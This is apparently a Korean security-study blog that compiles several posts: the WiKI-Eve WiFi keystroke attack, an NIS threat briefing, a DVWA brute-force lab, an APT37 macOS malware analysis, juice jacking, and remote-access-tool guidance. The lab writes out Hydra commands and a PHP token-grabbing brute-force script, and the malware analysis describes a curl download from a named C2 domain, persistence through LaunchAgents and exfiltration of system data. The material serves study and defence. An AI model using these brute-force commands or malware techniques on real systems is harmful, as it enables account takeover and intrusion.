꼰머의 보안공부

1. 개요

- 중국과 싱가포르 대학 연구진이 WiFi5(802.11ac)에 도입된 기능인 BFI를 활용해 스마트폰의 텍스트 전송을 가로채 비밀번호를 탈취하는 WiKI-Eve 공격이 발견
- 스마트폰과 와이파이 라우터 간 트래픽을 중간에서 가로채 어떤 숫자 키가 눌렸는지 확인하는 실시간 공격으로, 90% 정확도를 지님
- 공격이 성공하기 위해서는 공격자와 피해자가 동일한 네트워크에 있어야 하며, 피해자의 MAC 주소 또한 알고있어야함

- 공격자들이 AP를 해킹할 필요도 없이 중요한 정보를 정확하게 유추할 수 있음

2. 주요내용

2.1 BFI (Beamforming Feedback Information)

- 빔포밍(Beamforming)이란 기지국(또는 AP)에서 무선 신호를 특정 방향으로 무선 신호를 집중시키는 기술

> 즉, 전파를 특정 위치로 집중해 빔을 만들어 효율을 높이는 기술

> 신호를 집중시킴으로써 송출 전력을 증폭하지 않으면서 수신기에 전달되는 신호를 잘 잡을 수 있음

> 2013년 WiFi5(802.11ac)와 함께 처음 소개된 기술로, WiFi5에 도입됨

- BFI는 사용자 단말 등이 자신들의 위치에 대한 정보를 라우터로 전송하게 함으로써 라우터가 신호를 보다 정확하게 전송할 수 있도록 만들어줌

> 그러나, 데이터가 평문으로 전송되기 때문에 취약점이 발생

2.2 방법론

① 공격 대상 식별

- 공격자는 시각적인 모니터링과 트래픽 모니터링을 동시에 수행해 MAC 주소 식별

> 다양한 MAC 주소에서 발생하는 네트워크 트래픽을 사용자의 행동과 연관시켜 MAC 주소 식별

② 공격 타이밍 식별

- 공격 대상이 식별되면 비밀번호 입력 등의 행위를 기다림

> 관련 IP 주소(공격 대상과 통신하는 IP) 등을 DB화한 뒤 해당 IP와 통신이 발생할 때까지 대기

③ BFI  신호 탈취

- 사용자 단말에서 발생한 BFI 신호를 Wireshark와 같은 트래픽 모니터링 도구를 이용해 캡처

> 사용자가 스마트폰의 키를 누를 때마다 화면 뒤의 WiFi 안테나에 영향을 주어 뚜렷한 WiFi신호가 생성

④ 키스트로크 추론

- 수집된 BFI 신호를 분할하여 사용자의 키스트로크 추론

- 수집된 BFI 신호가 키 입력 간의 경계를 모호하게 만들 수 있어 사용 가능한 데이터를 분석하고 복원하는 알고리즘 적용

> 사용자마다 뚜렷한 타이핑 습관의 차이를 보이기 때문에 규칙 기반 분할이 아닌 데이터 기반 분할을 적용

> 분할은 CFAR(Constant False Alarm Rate) 알고리즘을 사용하여 수집된 BFI 신호의 피크를 식별하는 것부터 시작

＊ Constant False Alarm Rate (CFAR): 테스트하고자 하는 위치의 값과 주변 값의 관계를 보고 테스트 값이 대상인지 아닌지를 구분하는 알고리즘

> 결과를 방해하는 요소(타이핑 스타일, 속도, 인접한 키 입력 등)를 걸러내기 위해 "1-D Convolutional Neural Network" 기계 학습을 사용

＊ 합성곱 신경망(Convolutional Neural Network): n × m 크기의 겹쳐지는 부분의 각 이미지와 커널의 원소의 값을 곱해서 모두 더한 값을 출력

> 도메인 적응(특징 추출기, 키스트로크 분류기, 도메인 판별기로 구성) 개념을 통해 타이핑 스타일에 상관없이 키스트로크를 일관되게 인식하도록 훈련

＊ 도메인 적응(Domain Adaptation): 학습 데이터와 실제 데이터의 차이를 극복하고 모델의 성능 향상을 위해 데이터와 관련있는 추가적인 데이터를 학습

> 도메인별 특징을 억제하기 위해 GRL(Gradient Reversion Layer)를 적용해 일관된 키 입력 표현을 학습할 수 있도록 함

＊ Gradient Reversion Layer(GRL): 도메인 간의 분포 차이를 줄이고 도메인 적응을 수행하는 데 도움을 줌

⑤ 비밀번호 복구

- 20명의 참가자는 서로 다른 휴대폰으로 동일한 AP에 연결해 비밀번호를 입력

> 키 입력 분류 ​​정확도는 희소 복구 알고리즘과 도메인 적응을 사용할 때 88.9%로 안정적으로 유지

> 6자리 숫자 비밀번호의 경우 100회 미만의 시도에서 85%의 성공률을, 모든 테스트에서 75% 이상의 성공률을 보임

> 공격자와 AP 사이의 거리가 결과에 큰 영향을 끼치며, 거리를 1m에서 10m로 늘릴 경우 성공률은 23%로 감소

- 해당 연구는 숫자로만 구성된 비밀번호에만 작동

> NordPass의 연구에 따르면 상위 비밀번호 20개 중 16개(80%)는 숫자만 사용

2.3 완화 방안

- 데이터 암호화: BFI가 데이터를 평문으로 전송하여 발생하는 문제이기 때문에 암호화 적용

- 키보드 무작위화: 키보드 배열(레이아웃)을 무작위화 하여 어떤 키가 입력되었는지 알 수 없음

- 난독화: 트래픽 캡처 등을 방지하기 위해 난독화 적용

- 스크램블: 송신 측에서 기공유된 초기값과 데이터를 XOR하여 전송한 후 수신측에서 이를 복호화해 원래의 데이터를 복호화하는 방식으로 CSI 스크램블링, WiFi 채널 스크램블을 적용

3. 추가 대응 방안

- WiFi 암호 활성화 및 공용 WiFi 사용 지양

- 스마트폰, WiFi 등 업데이트를 적용해 최신상태 유지

4. 참고

[1] https://arxiv.org/pdf/2309.03492.pdf
[2] https://www.bleepingcomputer.com/news/security/new-wiki-eve-attack-can-steal-numerical-passwords-over-wifi/
[3] https://vosveteit.zoznam.sk/hacker-nepotrebuje-absolutne-nic-novy-utok-wiki-eve-moze-kradnut-ciselne-hesla-cez-wifi/
[4] https://techxplore.com/news/2023-09-exploit-passwords-keystrokes.html
[5] https://www.ludicweb.fr/wiki-eve-lattaque-wifi-qui-lit-vos-frappes-de-mot-de-passe-a-lecran
[6] https://cybersecuritynews.com/wiki-eve-wi-fi-passwords/
[7] https://digvel.com/blog/744/
[8] https://www.boannews.com/media/view.asp?idx=121878&page=5&kind=4
[9] https://isarc.tachyonlab.com/5563
[10] https://ko.wikipedia.org/wiki/%EB%B9%94%ED%8F%AC%EB%B0%8D
[11] https://www.kukinews.com/newsView/kuk202010200380
[12] https://wikidocs.net/64066
[13] https://cilabs.kaist.ac.kr/research/research-area/domain-adaptation
[14] https://zdnet.co.kr/view/?no=20201112124104
[15] https://nordpass.com/most-common-passwords-list/
[16] http://word.tta.or.kr/dictionary/dictionaryView.do?subject=%EC%8A%A4%ED%81%AC%EB%9E%A8%EB%B8%94%EB%A7%81%2F%EB%94%94%EC%8A%A4%ED%81%AC%EB%9E%A8%EB%B8%94%EB%A7%81

1. 개요

- 23.07.19 국정원은 국가사이버안보협력센터에서 사이버 안보 현안 관련 사이버위협 실태 및 대응방안 간담회 개최

- 공공기관 정보보안 실태 평가 결과와 북한의 사이버 공격 현황 및 전망 등 내용을 발표

2. 주요내용

2.1 2023 공공기관 정보보안 실태 평가 결과

- 2007년부터 중앙행정기관ㆍ광역지자체ㆍ공공기관 등을 대상으로 연 1회 '정보보안 관리실태 평가'를 수행

> 심화되는 사이버 위협으로부터 국가ㆍ공공기관을 보호하기 위한 예방 활동의 일환

> 23.01~04까지 공기업 36개, 준정부 기관 57개, 중소형 기관 37개 등 130개 기관을 대상으로 진행

- 공공기관 보안 수준은 100점 만점 중 평균 75.47점으로 전년대비 개선 (전년대비 3.6점 상승)

> 전담조직ㆍ인력ㆍ예산확보 등의 수준이 상승한 것이 주요 요인

> 130개 기관 중 25개 기관은 수준 미달로 조사

- 22.10 카카오마비 사태 등을 계기로 사이버 위기 발생 시 대응 방안 마련 여부 등을 집중 점검

> 위기 상황에 대비한 매뉴얼 정비, 위기 대응 훈련 실시 부분 달성률이 85%를 넘는 등 양호한 것으로 확인

> 업무 연속성 확보를 위한 복구 우선순위 수립 및 백업 복구훈련 실시 여부 집중 점검에서는 일부 미비점이 발견되었으나 달성률 84% 기록

- 기술적 보안 분야에서 절반에 가까운 공공기관에서 서버ㆍ네트워크ㆍ보안장비 등 정보시스템에 대한 접근통제가 미흡

> 용역업체 직원에 대한 접근 권한 차등 부여를 이행하지 않는 등 용역업체 보안관리 또한 전년대비 미흡

> 윈도7ㆍ윈도 서버 2008 등 EoS OS 사용, 시스템 보안패치 미 적용, 보안 설정 미흡 등 문제점

- 평가점수가 저조한 분야에 대해 교육과 현장 컨설팅 등을 강화해 보안 수준을 높이도록 유도할 계획

2.2 현황: 국내 사이버 공격 위협 급증

- 2022년 국내 일 평균 공공기관 해킹 시도는 약 137만 건

- 2023년 상반기 일 평균 공공기관 해킹 시도는 약 137만 건으로 15%증가

> 사이버 공격의 위협 수준을 수치로 변환한 위협 지수를 내부적으로 측정하며, 45점까지 관심 단계로 지정

> 과거에는 30점도 넘지 않았으나, 2023년 상반기의 경우 위협 수준이 30점 이상인 경우가 전체의 90%에 달함

- 공격 주체는 북한(70%), 중국(4%), 러시아(2%), 기타(24%) 순

> 북한의 해킹 수법이 정교해지고, 대상도 확대된 것으로 파악됨

> 과거에는 주요 공공기관 및 외교ㆍ안보 전문가를 대상으로 함

> 최근에는 불특정 국민을 대상으로 한 해킹 피해가 증가

- 중국발 해킹 또한 증가하는 추세

> 중국 업체가 제조해 국내 기관에 판매한 계측장비에 악성코드가 설치된 채 납품된 최초의 사례

> 관계기관과 합동으로 유사 장비에 대한 전수조사를 진행

> 한·미 정보당국은 중국산 정보통신기술(ICT) 제품들의 보안 취약점과 그 요인 등을 검증하기 위한 합동 분석에 돌입

- 북한은 최근 사이버 해킹을 통해 국민의 신용카드 정보 1000여 건을 탈취한 사실이 발견

> 국내 유명 포털 사이트의 내용이 실시간으로 동기화 되는 복제 피싱사이트를 구축

> 피싱 사이트를 통해 아이디와 비밀번호 등 계정정보 탈취

> 탈취한 계정정보를 이용해 포털에 접근 후 포털과 연동된 클라우드에 저장된 신용카드 정보를 탈취

※ 신용카드 정보: 카드번호, 유효기간, CVC 번호

> 국정원은 유관기관과 협조해 해당 카드들의 거래를 정지시킨 상태

※ 클라우드에 카드 정보 등 중요 정보를 저장하고 있다는 점을 악용

- 북한발 소프트웨어 공급망 해킹 시도가 지난해 하반기 대비 2배 이상 증가

> 지난해 말부터 국내 1000만 대 이상의 PC에 설치된 보안인증 SW를 해킹하여 대규모 PC 장악 시도

> 250여 개 기관에 납품된 보안제품을 해킹해 중요 국가기관의 내부망 침투 시도

- 신분을 위장한 북한 해커의 국내 에너지 기업의 해외 지사로 취업 시도 발각

> 여권과 졸업증명서를 위조하였으며, 해당 회사와 고용계약서까지 작성해 채용 직전 단계에서 적발

> 온라인 구인구직 사이트 링크드인에 소개글 업로드

> 국제 사회 제재 강화에 대응한 ICBM 발사 비용 충당 등을 위한 외화벌이 수단으로 파악됨

2.3 전망: 북한의 대남 사이버공격이 더욱 심화될 것

- 김영철 전 북한 노동당 대남비서가 최근 통일전선부 고문 직책으로 정치국 후보위원에 복귀

> 09.07.07 DDoS 공격, 11년 농협 전산망 파괴 등을 주도한 인물로 북한 사이버 공작의 핵심 역할

- 국민을 대상으로 한 금전 이득·개인 정보 절취 목적의 해킹 범죄도 늘어날 것

> 국제 및 국가 배후 해킹 조직의 국가 기반 시설 및 전산망 대상 사이버 공격

> 의료·교통 등 국민 안전을 볼모로 한 랜섬웨어 공격도 지속해서 발생할 것

> 대화형 AI 플랫폼을 통해 해킹 접근성이 쉬워짐

> 다크웹에서의 해킹 도구 거래도 보편화

- 24.04 총선 및 미국 대선 등을 앞두고 북한이 의식이나 행동변화를 유도하는 사이버 공작을 본격화할 가능성

3. 대응방안

- 국정원

> 우방국ㆍ민간 분야와 협력해 사이버 위협에 공세적으로 대응 (북한 가상자산 탈취 저지·차단 등)

> 우방국ㆍ글로벌 IT기업들과 정보공유 확대 및 우방국 합동 보안권고문 발표 확대

> 유관 기관과 AI 보안 관제 확대 보급 및 선거 보안 강화 등 대응 체계를 강화

> '제로 트러스트 보안 정책'을 2025년까지 부처별 시범 적용 후 2026년 이후 범정부 대상으로 확대 적용

> 양자 기술을 활용한 국가 암호 기술 확보를 추진

> '한미 사이버 안보 협력 프레임 워크'의 후속 조치를 위해 양국 간 협력 과제를 마련할 계획

- 일반 국민의 경우 기본 보안 수칙 준수

> 현재 사용중인 OS, S/W, 안티바이러스 등 최신 업데이트 적용

> 출처가 불분명한 파일 또는 링크 클릭 금지

> 서비스 별 고유한 계정정보 사용

> 주기적 비밀번호 교체 및 추측하기 어렵도록 설정 등

- 기업의 경우 전사에 걸친 보안 점검 수행

> 임직원 보안 교육

> 서비스 영향을 고려하여 서비스 및 포트 등 점검 후 불필요할 경우 제거

> 현재 사용중인 OS, S/W, 안티바이러스 등 최신 업데이트 적용

> 침해사고에 대비한 업무 연속성 확보 계획, 백업 및 복구 계획 등 주기적 점검 등

4. 참고

[1] https://www.boannews.com/media/view.asp?idx=120324&page=1&kind=1 

1. 개요

- 최근 크리덴셜 스터핑으로 인한 개인정보 노출 사례가 증가

> 22.12 페이팔 크리덴셜 스터핑 사고 이후 국내 한국장학재단, 워크넷 등에서 관련 사고가 발생

- 이미 다른 곳에서 탈취한 크리덴셜를 이용해 여러 웹 사이트나 앱에 접근을 시도(Stuffing, 대입)하여 개인정보나 자료를 탈취

> 크리덴셜이란 사용자가 본인을 증명하는 수단으로, 대부분의 사용자들이 여러 사이트에 같은 크리덴셜(패스워드)을 사용하고 있기 때문에 발생

> 가능한 모든 계정정보를 대입하는 Brute-Force 공격과 차이를 보임

2. 실습

2.1 DVWA Brute-Force: Level Low

- user/user 계정으로 로그인을 시도한 결과 "Username and/or password incorrect" 에러가 출력되며 로그인 실패

- 로그인 방식은 GET 메소드를 사용하며, 사용자로부터 username과 password 변수를 입력받음

- THC Hydra를 이용하여 공격을 자동화하여 실습을 진행

THC Hydra
- "The Hacker's Choice"(THC)라는 단체에서 개발하여 배포하는 명령행 기반의 모의침투(pentest) 도구
- SSH, TELENT, HTTP, HTTPS, FTP, LDAP, SMB, SNMP, POP3 등 다수의 통신규약에 대해 사전기반 비밀번호 공격도구
- 웹취약점분석에서는 관리자나 사용자 계정을 취약하게 관리하는 지의 여부를 점검할 수 있음

- 먼저 DVWA IP는 192.168.56.109이며, 로그인은 GET 방식으로 이루어짐

hydra 192.168.56.109 http-form-get

- 로그인 페이지는 /vulnerabilities/brute/, 사용자가 입력한 정보는 username=admin&password=user&Login=Login로 전달

- 로그인 실패 시 Username and/or password incorrect. 문자열이 출력

hydra 192.168.56.109 http-form-get "/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:Username and/or password incorrect."

- 실습 레벨이 Low라는 것을 사용자 쿠키 정보(개발자도구_F12 확인)를 통해 서버에 전달

hydra 192.168.56.109 http-form-get "/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:Username and/or password incorrect.:H=Cookie: security=low;PHPSESSID=37a1e75f8d963b6d9e0e254eef82422f"

- 이미 탈취한 계정정보(계정/비밀번호)를 저장한 파일을 사용해 요청 전송

- -t 옵션을 4로 지정해 동시에 4개씩 접속하도록 함

hydra 192.168.56.109 http-form-get "/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:Username and/or password incorrect.:H=Cookie: security=low;PHPSESSID=37a1e75f8d963b6d9e0e254eef82422f" -L week.txt -P pass.txt -t 4

- 출력 결과를 통해 유효한 계정은 admin/password인 것을 알 수 있음

※ 명령 수행 결과 출력이 오래 걸려 사진 대체

- Low 레벨의 PHP 소스를 확인해보면 비밀번호를 md5 해시화

- 사용자 입력값을 그대로 사용하며, 반복 로그인 시도 및 실패에 따른 계정 잠금 등의 조치가 없어 반복적인 대입이 가능

$user = $_GET[ 'username' ];

$pass = $_GET[ 'password' ];
$pass = md5( $pass );

$query  = "SELECT * FROM `users` WHERE user = '$user' AND password = '$pass';";
$result = mysql_query( $query ) or die( '<pre>' . mysql_error() . '</pre>' );

2.2 DVWA Brute-Force: Level Medium

- Low Level에서 security 쿠키 값만 medium으로 변경하여 요청 재전송

hydra 192.168.56.109 http-form-get "/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:Username and/or password incorrect.:H=Cookie: security=mediun;PHPSESSID=37a1e75f8d963b6d9e0e254eef82422f" -L week.txt -P pass.txt -t 4

- Medium 레벨의 PHP 소스를 확인해보면 username,password 변수에 mysql_real_escape_string() 함수를 사용해 사용자 입력값을 필터링

- SQL Injection 관련 취약점에 대해서는 대응이 가능하지만 반복적인 대입 공격에는 대응하지 못함

$user = $_GET[ 'username' ];
$user = mysql_real_escape_string( $user );
    
$pass = $_GET[ 'password' ];
$pass = mysql_real_escape_string( $pass );

2.3 DVWA Brute-Force: Level High

- Level High의 PHP 소스를 확인해보면 사용자의 token과 세션 token을 비교해 동일한 경우 로그인이 수행

- 사용자 token 값은 숨겨진 속성으로 전송되며, 로그인을 수행할때마다 값이 변경됨

checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );

$user = $_GET[ 'username' ];
$user = stripslashes( $user );
$user = mysql_real_escape_string( $user );

$pass = $_GET[ 'password' ];
$pass = stripslashes( $pass );
$pass = mysql_real_escape_string( $pass );

- 구글 조회를 통해 사용자 token을 받아온 후 해당 token을 이용해 로그인을 수행하는 스크립트를 사용

- 스크립트 사용 결과 계정 정보는 admin/password로 확인됨

<?php
$user_list = array( 'root', 'admin', 'manager' );
$pass_list = array( '123456', 'qwerty', '123456789', 'password', '12345678' );

foreach ($user_list as $user) {
    foreach ($pass_list as $pass) {
        $c = curl_init('http://192.168.206.136/vulnerabilities/brute/index.php');
        curl_setopt($c, CURLOPT_COOKIE, 'PHPSESSID=gulk7ha641o55qk52os77asr42; security=high');
        curl_setopt($c, CURLOPT_RETURNTRANSFER, true);
        $page = curl_exec($c);
        $needle = "user_token' value='";
        $token = substr($page, strpos($page, $needle)+strlen($needle), 32);
        curl_close($c);

        $c = curl_init('http://192.168.206.136/vulnerabilities/brute/index.php?username='.$user.'&password='.$pass.'&Login=Login&user_token='.$token);
        curl_setopt($c, CURLOPT_COOKIE, 'PHPSESSID=gulk7ha641o55qk52os77asr42; security=high');
        curl_setopt($c, CURLOPT_RETURNTRANSFER, true);
        $page = curl_exec($c);
        curl_close($c);
        if (strstr($page, 'Username and/or password incorrect.')) continue;
        else {
            echo $user.'/'.$pass." 로그인 성공!\n";
            exit(0);
        }
    }
}
?>

2.4 DVWA Brute-Force: Level Impossible

- Impossible 레벨의 PHP 소스코드를 확인해보면 3회이상 계정 오입력 시 15분동안 계정을 잠금 처리

- 공격자는 15분동안 대기해야 하므로 반복적 대입 공격이 거의 불가능함

- 하지만, 정상적인 사용자 또한 15분을 대기하여야 하므로 적절한 시간 설정이 필요

// Default values
$total_failed_login = 3;
$lockout_time       = 15;
$account_locked     = false; 

[생략]

if( ( $data->rowCount() == 1 ) && ( $row[ 'failed_login' ] >= $total_failed_login ) )  {
        // User locked out.  Note, using this method would allow for user enumeration!
        //echo "<pre><br />This account has been locked due to too many incorrect logins.</pre>";

        // Calculate when the user would be allowed to login again
        $last_login = $row[ 'last_login' ];
        $last_login = strtotime( $last_login );
        $timeout    = strtotime( "{$last_login} +{$lockout_time} minutes" );
        $timenow    = strtotime( "now" );

        // Check to see if enough time has passed, if it hasn't locked the account
        if( $timenow > $timeout )
            $account_locked = true;
    }

3. 대응방안

- 봇 차단

- 다중인증 도입

- 비밀번호 설정 규칙 강화

- 비밀번호 실패 횟수 및 계정 잠금 시간 설정

- 각 서비스마다 고유한 계정정보를 사용

4. 참고

[1] https://github.com/vanhauser-thc/thc-hydra
[2] https://medium.com/hacker-toolbelt/dvwa-1-9-ii-brute-force-4cd8efe1c7f2
[3] https://webhack.dynu.net/?idx=20161205.003
[4] http://blog.plura.io/?p=13094

1. 개요

- 23.05.17 지니언스 시큐리티 센터(이하 GSC)는 북한연계 해킹 그룹 APT37 의 새로운 사이버 위협 활동을 발견

> 대북 분야 주요 인사들은 북한연계 해킹 그룹의 사이버 위협으로 부터의 나름의 전략으로 맥북 사용을 선호

- 공격 대상의 비밀번호 탈취를 위해 피싱 공격과 정보 수집 수행 후 해당 과정에서 확인된 웹 브라우저 및 OS 정보를 활용해 MacOS 기반 악성파일 공격을 수행

> MacOS 공격은 대표적으로 정상 서비스로 위장한 솔루션, 불법 소프트웨어 자료실, MS Word 문서 메크로 등

> 해당 사례의 경우 이메일 본문 내 MacOS 용 ZIP 파일 다운로드 링크를 포함하여 클릭을 유도하는 스피어 피싱

※ MacOS 이용자의 일반적인 경험과 확장자 숨긴 조건, 아이콘만으로 파일 유형을 판단해 접근하는 맹점을 이용

2. 주요내용

2.1 피싱 메일

- 공격자는 고려대 일민국제관계연구원에서 운영하는 온드림 글로벌 아카데미 담당교수를 사칭

- 북한 인권 제도 및 실태 주제의 특강을 요청하는 메일 발송

> 이메일 제목 예시: [특강 의뢰] 6.30(금) 고려대 일민국제관계연구원 - 온드림 글로벌 아카데미 등

> 고려대 일민국제관계연구원은 공식 사이트를 통해 "[알림] 연구원 직원 사칭 사이버공격(스피어피싱) 메일 주의" 게시

- 강의 의뢰에 대한 수락 의사를 회신할 경우 악성 링크가 포함된 안내 메일 발송

> 보안 메일 보기 버튼 클릭 유도 및 구글 Gmail 계정 정보 탈취를 시도 

> 비밀번호 탈취에 실패하더라도 User-Agent 값으로 대상자의 OS와 웹 브라우저를 식별 가능

※ 관련 정보는 환경에 따른 우회 및 가용성, 무결성을 손상시키기 위한 맞춤형 공격을 설계하는데 활용

- R2P 국제회의 진행자료 파일로 위장 및 북한 인권 운동 홍보에 활용해 달라는 내용으로 첨부자료 열람을 유도

> 첨부자료명: '제 6 회 R2P 국제회의 진행자료.zip'

2.2 악성 동작

- '제 6 회 R2P 국제회의 진행자료.zip' 파일은 6개의 파일이 존재

> ‘제 6 회 R2P 국제회의.app’ 맥용 응용프로그램(번들)과 미끼용 JPG 사진 파일 5 개

※ 번들: 실행 코드와 해당 코드에 사용되는 리소스를 포함하는 표준화된 계층 구조를 가진 디렉토리

- 일반적인 MacOS 환경에서 '모든 파일 확장자 보기' 기능이 해제 되어있어 아이콘만으로 파일 유형을 판단하도록 유도

> JPG 파일의 경우 확장자가 기본 설정에서 보이지만, APP 확장자는 보이지 않음

- 해당 번들의 패키지 내용을 보면 리소스내 ‘AppIcon.icns’ 애플 아이콘 이미지가 HWP 문서로 지정

> 정상 ‘제 6 회 R2P 국제회의.hwp’ 문서를 내부에 포함해 악성 파일이 실행될 때 함께 보여주는 용도로 사용

2.2.1 Image 파일

- 파일 내부에는 curl 명령이 삽입되어 있어 C2 서버에서 파일을 다운로드하여 실행

> 삼성 관련 도메인으로 위장하고 있으며, 현재는 민관 협력을 통해 국내 접속을 차단한 상태

> ‘pathForResource:ofType:’ 함수를 통해 번들 내부 리소스 영역에 존재하는 ‘제 6 회 R2P 국제회의.hwp’ 정상 문서를 실행하여 의심 최소화

① curl

- samsunggalaxynote[.]com에서 whatnew 파일을 tmp 경로에 ‘com.apple.auto_update’ 이름으로 다운로드해 저장

② xattr

- MacOS에서 파일이나 디렉터리에 속성 내용을 관리하는 명령어

- 다운로드 경로 등의 정보를 제거

③ chmod

④ rm

2.2.2 com.apple.auto_update 파일

- Image 파일과 동일한 C2 서버로 접근해 ‘singlework’를 다운로드하여 '.loginwindow'로 저장

> ‘/Users/%@/Library/LaunchAgents’ 경로에 '.com.apple.windowserver.plist' 파일을 숨김속성으로 생성

> RunAtLoad(로드시 실행), KeepAlive(실행 상태유지) 오브젝트 키 옵션을 활성화(true)

> ‘launchctl remove com.google.keystone.xpc.server’ 명령을 수행하여, 구글 크롬 관련 파일 삭제를 시도

2.2.3 .loginwindow 파일

- 앞서 확인되었던 동일한 C2와 통신을 수행

> Temporary Item 경로에 현재 날짜와 시간, 프로세스 리스트, 이용자 정보, 아이피 주소와 네트워크 구성 등 다양한 시스템 정보(System Info)를 수집 및 텍스트 파일로 저장해 C2 서버로 전송을 시도

> ‘us’ 파일을 임시폴더(tmp) 경로에 ‘mdworker’ 파일로 다운로드 후 실행하여 추가 명령을 진행

3. 이전 사례와의 유사도

- 과거 확인된 C2 주소와 동일한 C2 주소 사용

- 위장 파일에 삽입된 명령의 유사함

- 정보 탈취 대상 목록 파일의 유사함

4. 악성파일 제작 도구 노출

- C2 서버를 통해 바로가기(LNK) 악성파일 제작 도구가 노출

> MFC(Microsoft Foundation Class Library) 기반으로 제작
> 23.03.24 09:52 제작되어 현재까지 사용 중
> PDB 경로: C:\Users\JJJ\Desktop\tmp\MyEWork_Auto\Debug\MyEWork_Auto.pdb

5. 참고

[1] https://www.genians.co.kr/blog/threat_intelligence_report_macos
[2] https://n.news.naver.com/article/005/0001617760?cds=news_my_20s

1. 개요

- 23.04 FBI 덴버 사무소는 공공장소에서 흔히 볼 수 있는 공용 USB 포트를 사용한 스마트폰 충천 금지 발표 [1]

- 공격자들이 공용 USB 포트를 통해 멀웨어와 모니터링 소프트웨어를 사용자 단말에 설치하는 방법을 알아냄

- 공항, 호텔, 쇼핑센터 등에서 USB 포트 대신 개인용 충전기 사용 권고

2. 주요 내용

- FBI와 연방통신위원회(FCC)는 공용 USB 포트를 사용한 "주스재킹(Juice jacking)"을 경고 [2][3]

> 지난 5년간 주스재킹과 관련된 해킹 공격이 공식적으로 보도되지 않았으며, 기술적인 어려움 또한 존재

> 그러나, 관련 해킹이 불가능한 것은 아니며 아직까지는 기술 및 비용적 효율이 낮기 때문으로 보임

> 2022년 발표에 따르면 USB를 활용하도록 설계된 멀웨어와 관련된 위협이 52%로 증가 [4]

주스재킹(Juice jacking)
- 2011년 DEFCON에서 최초로 선보인 공격 기법
- 공항, 호텔, 쇼핑센터 등 공공장소에 있는 공용 USB를 이용한 멀웨어 유포 및 정보 탈취 공격
- 손상된 USB 포트를 통해 설치된 멀웨어는 장치를 잠그거나 사용자의 비밀번호, 신용카드 정보, 주소, 이름 등의 정보를 훔칠 수 있음
- 탈취한 개인 정보를 통해 공격자는 계정에 액세스 하거나 다른 공격자들에게 판매하여 2차 피해가 발생 가능

- 주스재킹을 수행하는데 필요한 기술과 비용, 접근성 등은 과거에 비해 누구나 접근할 수 있도록 발전되고 있음

> 대표적으로 O.MG 케이블이 존재 [5][6]

> 외형은 애플의 케이블과 유사해 육안으로 식별하기 어려우며 다양한 기능을 제공

> 자체적으로 와이파이 핫스팟을 만들고 해커는 1.5km 떨어진 곳에서도 키 입력 정보를 받아 볼 수음

> MG라는 보안 연구원이 침투 테스트용으로 개발해 2019 DEFCON에서 공개하였으며, 보안 업체 Hak5가 양산 및 판매

- 스마트폰 제조업체는 주스재킹의 위협을 줄이기 위한 보호 기능을 개발 중이나 결코 완벽하다고 할 수 없음

> 아이폰 또는 아이패드의 경우 공용 USB 포트에 연결하면 ‘이 컴퓨터를 신뢰하시겠습니까?’ 등의 메시지 표시

> 관련 메시지가 표시되지 않더라도 ‘액세서리가 지원되지 않음’이라는 경고가 표시될 수 있으며, 즉시 연결 해제 필요

> 사용자의 단말이 멀웨어에 감염 되었는지 알 수 없으며, 탐지 또한 어려움 

> 따라서, 공용 USB 포트나 케이블은 가급적 사용하지 말고, 보조 배터리 또는 콘센트 이용 권고

3. USB 데이터 차단기

- 주스재킹 등 관련된 위협을 줄이고자 등장한 일종의 젠더 [7]

- 일반적인 USB는 4개의 핀으로 구성

> 충전을 위한 핀 2개와 데이터 전송을 위한 핀 2개로 구성됨

- USB 데이터 차단기는 데이터 전송을 위한 2개의 핀을 제거하여 데이터 전송을 차단하는 원리

> 데이터 전송 핀을 제거하여 데이터 유출 위험이 없으며, 멀웨어를 유포하지 못함

> 멀웨어 유포 및 데이터 유출 위험으로부터 단말을 보호하여 프라이버시를 향상

> 일반적인 USB와 크기가 비슷하여 휴대성이 뛰어나며, 저렴

4. 참고

[1] https://www.cbsnews.com/news/fbi-warns-against-juice-jacking-what-is-it/
[2] https://twitter.com/FBIDenver/status/1643947117650538498?ref_src=twsrc%5Etfw%7Ctwcamp%5Etweetembed%7Ctwterm%5E1643947117650538498%7Ctwgr%5E8e2bfe2d8f81b6903ee3ccdd6699d21c8023eb0a%7Ctwcon%5Es1_&ref_url=https%3A%2F%2Fwww.cbsnews.com%2Fnews%2Ffbi-warns-against-juice-jacking-what-is-it%2F
[3] https://www.fcc.gov/juice-jacking-tips-to-avoid-it
[4] https://www.honeywellforge.ai/us/en/campaigns/industrial-cybersecurity-threat-report-2022#form
[5] https://shop.hak5.org/products/omg-cable
[6] https://www.earlyadopter.co.kr/153255
[7] https://www.amazon.com/PortaPow-3rd-Data-Blocker-Pack/dp/B00T0DW3F8/ref=sr_1_3?crid=1WASVMK1MP6UI&keywords=USB+condoms&qid=1685191337&sprefix=usb+c%2Caps%2C1011&sr=8-3&tag=muo-v2-3h3kgvk-20&ascsubtag=UUmuoUeUpU2025871&asc_refurl=https%3A%2F%2Fwww.makeuseof.com%2Fwhat-is-usb-condom%2F&asc_campaign=Evergreen

1. 개요

- 미국 CISA, FBI, NSA, MS-ISAC 및 이스라엘 INCD(Israel National Cyber ​​Directorate)에서 원격 엑세스 소프트웨어 보안 가이드 발표

- 공격자들은 합법적인 목적의 원격 엑세스 소프트웨어를 악용해 보안 장비의 탐지를 우회하여 침입하므로 관련 보안 강화 권고

2. 주요내용

- 원격 엑세스 소프트웨어는 합법적인 목적으로 서버 등에 설치되어 사용되므로 보안 소프트웨어에서 탐지되지 않음

- 공격자는 관련 도구를 사용해 LOTL(Living off the Land) 공격을 진행

LOTL(Living off the Land) 공격
- 자급자족식 공격
> 보안 솔루션의 성능이 향상됨에 따라 탐지를 우회하거나 보안 솔루션의 탐지 대상이 아닌 소프트웨어를 이용한 공격이 주목을 받으며 등장

- 공격 대상 시스템에  미리 설치되어 있는 도구를 활용하여 공격을 수행하며, 합법적인 과정으로 자신의 행위를 숨길 수 있으며 탐지를 더욱 어렵게 만듦
> 윈도우 CMD, PowerShell 등의 합법적 도구 및 사용자가 설치한 취약점이 존재하는 소프트웨어 등을 공격에 이용

- 다음과 같은 이점을 지님
① 보안 장비의 탐지를 우회할 수 있음: 정삭적인 툴로써 동작
② 공격 식별 감소: 기존 공격 툴의 경우 공격 시 관련된 시그니처 등 정보가 기록됨
